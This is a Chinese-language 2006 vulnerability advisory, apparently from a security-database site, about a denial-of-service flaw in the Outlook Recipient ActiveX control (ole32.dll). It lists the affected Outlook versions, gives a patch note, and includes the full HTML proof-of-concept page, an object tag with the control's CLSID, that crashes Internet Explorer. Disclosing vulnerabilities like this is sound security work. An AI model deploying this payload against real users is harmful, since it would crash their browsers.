Microsoft Outlook ActiveX控件远程Internet Explorer拒绝服务漏洞
发布日期:2006-12-18
更新日期:2006-12-19
受影响系统:Microsoft Outlook XP
Microsoft Outlook 98
Microsoft Outlook 97
Microsoft Outlook 2003
Microsoft Outlook 2002
Microsoft Outlook 2000
描述:
BUGTRAQ ID:
21649
Microsoft Outlook是Office套件所捆绑的邮件客户端。
Microsoft Outlook的Recipient控件(ole32.dll)存在拒绝服务漏洞。如果用户受骗打开了恶意的HTML邮件的话,就会导致Internet Explorer或其他使用该ActiveX控件的应用程序崩溃。
<*来源:shinnai (
shinnai@autistici.org)
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<!--
------------------------------------------------------------------------
Microsoft Office Outlook Recipient Control (ole32.dll) Denial of Service
author: shinnai
site:
http://shinnai.altervista.org
mail: shinnai[at]autistici[dot]org
and, always, special thanks to rgod
Tested on Windows Xp Professional SP2 all patched
works with Internet Explorer 6 & 7
------------------------------------------------------------------------
-->
<html>
<head>
<title></title>
</head>
<object classid="clsid:0006F023-0000-0000-C000-000000000046" id="oLook" width="180" height="14"></object>
</html>
<!--
Just enable the control by clicking on it, then try to close IE.
-->
建议:
厂商补丁:
Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.microsoft.com/technet/security/浏览次数:3073
严重程度:0(网友投票)
